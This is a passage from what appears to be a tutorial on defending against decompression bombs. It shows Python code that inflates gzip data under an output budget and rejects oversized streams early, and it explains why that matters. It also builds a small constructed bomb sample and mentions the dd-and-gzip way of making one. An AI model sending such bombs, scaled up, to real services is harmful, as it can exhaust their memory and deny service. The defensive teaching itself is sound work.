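    inflater = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)  # 16+ selects the gzip container
    out = bytearray()
    pending = data
    while pending and not inflater.eof:
        out += inflater.decompress(pending, chunk)
        if len(out) > max_output:
            consumed = len(data) - len(inflater.unconsumed_tail)
            raise DecompressionBomb(
                f"more than {max_output} bytes after consuming {consumed} of {len(data)} input bytes")
        pending = inflater.unconsumed_tail
    out += inflater.flush()
    if len(out) > max_output:
        raise DecompressionBomb(f"more than {max_output} bytes of output")
    return bytes(out)

def make_bomb(mebibytes=8):
    """Constructed sample: gzip of all-zero bytes, the dd if=/dev/zero | gzip file at a smaller size."""
    return gzip.compress(b"\x00" * (mebibytes * 1024 * 1024))

def inflate_report(data, max_output):
    """('ok', inflated_length) or ('rejected', reason)."""
    try:
        return ("ok", len(bounded_gunzip(data, max_output)))
    except DecompressionBomb as exc:
        return ("rejected", str(exc))

if __name__ == "__main__":
    bomb = make_bomb(8)
    print(len(bomb), "compressed bytes claim", gzip_isize(bomb), "bytes")
    print(inflate_report(bomb, 1024 * 1024))
```

The rejection fires after reading only a few hundred compressed bytes, which is the property that matters: the cost of refusing a bomb must be proportional to the budget, not to what the file would expand to. The same loop shape works for a zlib or raw deflate stream by changing wbits, and for xz via lzma.LZMADecompressor, which offers the same max_length argument.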